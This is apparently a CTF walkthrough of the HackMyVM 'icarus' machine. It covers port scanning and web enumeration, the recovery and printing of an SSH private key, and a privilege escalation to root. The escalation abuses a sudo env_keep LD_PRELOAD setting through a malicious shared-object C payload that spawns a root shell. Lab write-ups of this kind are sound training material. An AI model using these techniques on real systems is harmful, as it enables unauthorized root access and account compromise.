Home icarus
Post
Cancel

icarus

Overview

Box DifficultyLink
Mediumhackmyvm Link

Recon

1
2
3
4
5
6
7
┌──(root💀kali)-[/opt/hackmyv/icarus]
└─# masscan -p1-65535,U:1-65535 192.168.56.35 --rate=1000 
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-01-06 01:16:24 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 192.168.56.35                                   
Discovered open port 22/tcp on 

Enumerate ports that were found to be open:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root💀kali)-[/opt/hackmyv/icarus]
└─# nmap -sVC -O -p 22,80 192.168.56.35 -o nmap.txt                                                                                                                   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-05 20:24 EST
Nmap scan report for 192.168.56.35
Host is up (0.00051s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 b6:65:56:40:8d:a8:57:b9:15:1e:0e:1f:a5:d0:52:3a (RSA)
|   256 79:65:cb:2a:06:82:13:d3:76:6b:1c:55:cd:8f:07:b7 (ECDSA)
|_  256 b1:34:e5:21:a0:28:30:c0:6c:01:0e:b0:7b:8f:b8:c6 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: LOGIN
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:33:65:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.61 seconds
                                                              

Begin enumeration.

HTTP- TCP 80

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
┌──(root💀kali)-[/opt/hackmyv/icarus]
└─# gobuster dir -u http://192.168.56.35:80 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 100 -e -k -s "200,204,351,352,357,403,500" -x "txt,html,php,php.bak,bak,jsp"
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.35:80
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              bak,jsp,txt,html,php,php.bak
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2022/01/05 20:28:13 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.56.35:80/a                    (Status: 200) [Size: 9641]
http://192.168.56.35:80/check.php            (Status: 200) [Size: 21]  
http://192.168.56.35:80/index.php            (Status: 200) [Size: 407] 
http://192.168.56.35:80/index.php            (Status: 200) [Size: 407] 
http://192.168.56.35:80/login.php            (Status: 302) [Size: 0] [--> index.php]
http://192.168.56.35:80/xdb                  (Status: 200) [Size: 1]                
http://192.168.56.35:80/xml                  (Status: 200) [Size: 1]                
http://192.168.56.35:80/xyz                  (Status: 200) [Size: 1]                
http://192.168.56.35:80/xxx                  (Status: 200) [Size: 1]                
http://192.168.56.35:80/xls                  (Status: 200) [Size: 1]                
http://192.168.56.35:80/xsl                  (Status: 200) [Size: 1]                
                                                                                    
===============================================================
2022/01/05 20:28:15 Finished

┌──(root💀kali)-[/opt/hackmyv/icarus]
└─# wget http://192.168.56.35:80/a 
--2022-01-05 20:32:04--  http://192.168.56.35/a
Connecting to 192.168.56.35:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9641 (9.4K) [application/octet-stream]
Saving to: ‘a.txt’

a                                          100%[======================================================================================>]   9.42K  --.-KB/s    in 0s      

2022-01-05 20:32:04 (271 MB/s) - ‘a’ saved [9641/9641]

┌──(root💀kali)-[/opt/hackmyv/icarus]
└─# mv a a.txt | head a.txt                       

a
xaa
xab
xac
xad
xae
xaf
xag
xah




Shell as icarus

Curl all links from and save to output.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
for i in $(cat a.txt); do curl "http://192.168.56.35/$i" >> curl.output; done

┌──(root💀kali)-[/opt/hackmyv/icarus]
└─# tail -n 30 curl.output
xzbta
xzbtb
xzbtc
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA5xagxLiN5ObhPjNcs2I2ckcYrErKaunOwm40kTBnJ6vrbdRYHteS
afNWC6xFFzwO77+Kze229eK4ddZcwmU0IdN02Y8nYrxhl8lOc+e5T0Ajz+tRmLGoxJVPsS
TzKBERlWpKuJoGO/CEFLOv6PP6s79YYzZFpdUjaczY96jgICftzNZS+VkBXuLjKr79h4Tw
z7BK4V6FEQY0hwT8NFfNrF3x3VPe0UstdiUJFl4QV/qAPlHVhPd0YUEPr/95mryjuGi1xw
P7xVFrYyjLfPepqYHiS5LZxFewLWhhSjBOI0dzf/TwiNRnVGTZhB3GemgEIQRAam26jkZZ
3BxkrUVckQAAA8jfk7Jp35OyaQAAAAdzc2gtcnNhAAABAQDnFqDEuI3k5uE+M1yzYjZyRx
isSspq6c7CbjSRMGcnq+tt1Fge15Jp81YLrEUXPA7vv4rN7bb14rh11lzCZTQh03TZjydi
vGGXyU5z57lPQCPP61GYsajElU+xJPMoERGVakq4mgY78IQUs6/o8/qzv1hjNkWl1SNpzN
j3qOAgJ+3M1lL5WQFe4uMqvv2HhPDPsErhXoURBjSHBPw0V82sXfHdU97RSy12JQkWXhBX
+oA+UdWE93RhQQ+v/3mavKO4aLXHA/vFUWtjKMt896mpgeJLktnEV7AtaGFKME4jR3N/9P
CI1GdUZNmEHcZ6aAQhBEBqbbqORlncHGStRVyRAAAAAwEAAQAAAQEAvdjwMU1xfTlUmPY3
VUP9ePsBwSIck6ML8t35H8KFLKln3C4USxpNNe/so+BeTo1PtBVHYpDFu9IMOvrl7+qW3q
dLGyUpdUtQXhPK+RvJONt30GwB+BEUlpQYCW9SuHr1WCwfwPMA5iNdT2ijvx0ZvKwZYECJ
DYlB87yQDz7VCnRTiQGP2Mqiiwb7vPd/t386Y+cAz1cVl7BnHzWWJTUTkKCwijnvjYrD0o
tTQX4sGd6CrI44g+L8hnYuCZz+a0j6IyUfXJqj6l+/Z2Af7pJjbJD3P28xX7eY0h1Cec2l
/sb7qg2wy0qJNywJ35l8bZzZKjkXztPLOqMFQ6Fh0BqSdQAAAIEAlaH0ZEzJsZoR3QqcKl
xRKjVcuQCwcrKlNbJu2qRuUG812CLb9jJxJxacJPBV0NS832c+hZ3BiLtA5FwCiGlGq5m5
HS3odf3lLXDfIK+pur4OWKBNLDxKbqi4s4M05vR4gHkmotiH9eWlCNuqL46Ip5H1vFXeJM
pLRLN0gqOGuQQAAACBAPfffuhidAgUZH/yTvATKC5lcGrE7bkpOq+6XMMgxEQl0Hzry76i
rGXkhTY4QUtthYo4+g7jiDzKlbeaS7aN8RYq38GzQnZZQcSdvL1yB/N554gQvzJLvmKQbm
gLhMRcdDmifUelJYXib2Mjg/BLaRXaEzOomUKR2nyJH7VgU+xzAAAAgQDuqkBp44indqhx
wrzbfeLnzQqpZ/rMZXGcvJUttECRbLRfohUftFE5J0PKuT8w0dpacNCVgkT9A0Tc3xRfky
ECBQjeKLvdhcufJhQl0pdXDt1cpebE50LE4yHc8vR6FEjhR4P2AbGICJyRS7AX7UnrOWdU
IE3FeNP0r5UiSDq16wAAAA1pY2FydXNAaWNhcnVzAQIDBA==
-----END OPENSSH PRIVATE KEY-----

Save private key

1
2
3
4
5
┌──(root💀kali)-[/opt/hackmyv/icarus]
└─# nano id_rsa                                    
                                                                                                                                                                          
┌──(root💀kali)-[/opt/hackmyv/icarus]
└─# chmod 600 id_rsa 

USE SSH KEYGEN TO FIND USERNAME OF PRIVATE KEY!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root💀kali)-[/opt/hackmyv/icarus]
└─# ssh-keygen -y -f id_rsa

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnFqDEuI3k5uE+M1yzYjZyRxisSspq6c7CbjSRMGcnq+tt1Fge15Jp81YLrEUXPA7vv4rN7bb14rh11lzCZTQh03TZjydivGGXyU5z57lPQCPP61GYsajElU+xJPMoERGVakq4mgY78IQUs6/o8/qzv1hjNkWl1SNpzNj3qOAgJ+3M1lL5WQFe4uMqvv2HhPDPsErhXoURBjSHBPw0V82sXfHdU97RSy12JQkWXhBX+oA+UdWE93RhQQ+v/3mavKO4aLXHA/vFUWtjKMt896mpgeJLktnEV7AtaGFKME4jR3N/9PCI1GdUZNmEHcZ6aAQhBEBqbbqORlncHGStRVyR icarus@icarus

┌──(root💀kali)-[/opt/hackmyv/icarus]
└─# ssh -i id_rsa icarus@192.168.56.35
Linux icarus 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan  5 20:44:47 2022 from 192.168.56.3
icarus@icarus:~$ whoami;id;hostname
icarus
uid=1000(icarus) gid=1000(icarus) groups=1000(icarus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
icarus
icarus@icarus:~$ 

Shell as Root

linpeas highlighted env_keep+=LD_PRELOAD !

1
2
3
4
5
6
7
8
9
icarus@icarus:/tmp$ bash linpeas.sh 
                                                                                                                                                                         
[+] Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d                                                                                                                  
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                                                                             
Matching Defaults entries for icarus on icarus:                                                                                                                           
    env_reset, mail_badpass, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin                                          
                                                                                                                                                                          
User icarus may run the following commands on icarus:                                                                                                                     
    (ALL : ALL) NOPASSWD: /usr/bin/id                                                                                                                                                              

To exploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
icarus@icarus:/tmp$ nano preload.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}

icarus@icarus:/tmp$  gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
preload.c: In function ‘_init’:
preload.c:6:1: warning: implicit declaration of function ‘setresuid’ [-Wimplicit-function-declaration]
 setresuid(0,0,0);
 ^~~~~~~~~
icarus@icarus:/tmp$ ls
 preload.c  preload.so 

icarus@icarus:/tmp$  sudo LD_PRELOAD=/tmp/preload.so id
root@icarus:/tmp# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
root@icarus:/tmp# cat /root/root.txt 
This post is licensed under CC BY 4.0 by the author.